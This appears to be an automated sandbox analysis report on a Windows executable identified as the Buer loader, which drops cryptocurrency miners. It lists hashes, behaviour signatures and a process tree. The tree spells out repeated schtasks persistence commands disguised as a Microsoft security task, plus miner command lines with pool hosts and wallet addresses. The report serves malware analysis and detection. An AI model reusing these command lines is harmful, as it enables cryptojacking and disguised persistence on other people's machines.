Analysis

  • max time kernel
    151s
  • max time network
    140s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    05-09-2021 16:19

General

  • Target

    d59962806fcf8c3ed228654da0b964da.exe

  • Size

    17KB

  • MD5

    d59962806fcf8c3ed228654da0b964da

  • SHA1

    0373488126b5f13c8fd60ee37b81624568490db0

  • SHA256

    f29908da1b8065356704e746f9e282378a7e5ae65c753e2e9fe02b214b5b792b

  • SHA512

    f960494711f5230f86c9f76a2c43549eb64694a0f5a3dca5a3bee1ff55b78b854119bfd65d2676582edc36e80b84cdc0484f399c5eff98462e07caa8de164a88

Score
10/10

Malware Config

Signatures

  • Buer

    Buer is a new modular loader first seen in August 2019.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d59962806fcf8c3ed228654da0b964da.exe
    "C:\Users\Admin\AppData\Local\Temp\d59962806fcf8c3ed228654da0b964da.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:604
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1848
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4088
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2668
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:952
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2736
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2164
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2184
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4012
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3332
    • C:\ProgramData\1A60FBA9DF6219524D38\SystemManager.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\SystemManager.exe" -o pool.hashvault.pro:80 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQq8ANCL4mu9QqMXeRL --donate-level 1 -p x
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2252
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2192
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2736
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3996
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2360
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2912
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3332
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2964
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3920
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:636
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:792
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:872
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2664
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4012
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3368
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3084
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1184
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2672
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3192
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3480
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3996
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3332
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1908
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:744
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3368
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2408
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:868
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3884
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3480
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2864
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3856
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3892
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3632
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2212
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:512
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1184
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:404
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1344
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2736
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1828
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2680
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1340
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2724
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2772
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3976
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4092
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1724
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3292
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2360
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1808
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1820
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2668
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:4012
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:988
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3352
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1512
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3004
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:3988
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2340
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1016
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1476
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:228
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:1828
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:3996
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2192
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\Framework\MicrosoftSecurityEssentials /XML "C:\ProgramData\1A60FBA9DF6219524D38\task"
      2⤵
      • Creates scheduled task(s)
      PID:2964
    • C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe
      "C:\ProgramData\1A60FBA9DF6219524D38\DriverStore.exe" -epool eu1-etc.ethermine.org:4444 -ewal 0xBc1013eB2489893F32cE9dd36f55cd12aB7CcC2B -worker 1A60FBA9DF6219524D38 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin etc -acm
      2⤵
      PID:208
    • C:\ProgramData\1A60FBA9DF6219524D38\moduleName.exe
      C:\ProgramData\1A60FBA9DF6219524D38\moduleName.exe
      1⤵
      • Executes dropped EXE
      PID:3188
    • C:\ProgramData\1A60FBA9DF6219524D38\moduleName.exe
      C:\ProgramData\1A60FBA9DF6219524D38\moduleName.exe
      1⤵
      • Executes dropped EXE
      PID:872

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/604-114-0x0000000000EF0000-0x0000000000EF1000-memory.dmp
    Filesize: 4KB

  • memory/604-118-0x0000000001460000-0x0000000001462000-memory.dmp
    Filesize: 8KB

  • memory/2252-162-0x0000000001140000-0x0000000001160000-memory.dmp
    Filesize: 128KB

  • memory/2252-135-0x0000000000180000-0x00000000001A0000-memory.dmp
    Filesize: 128KB

  • memory/2252-143-0x00000000001C0000-0x00000000001E0000-memory.dmp
    Filesize: 128KB

  • memory/2252-161-0x00000000001E0000-0x0000000000200000-memory.dmp
    Filesize: 128KB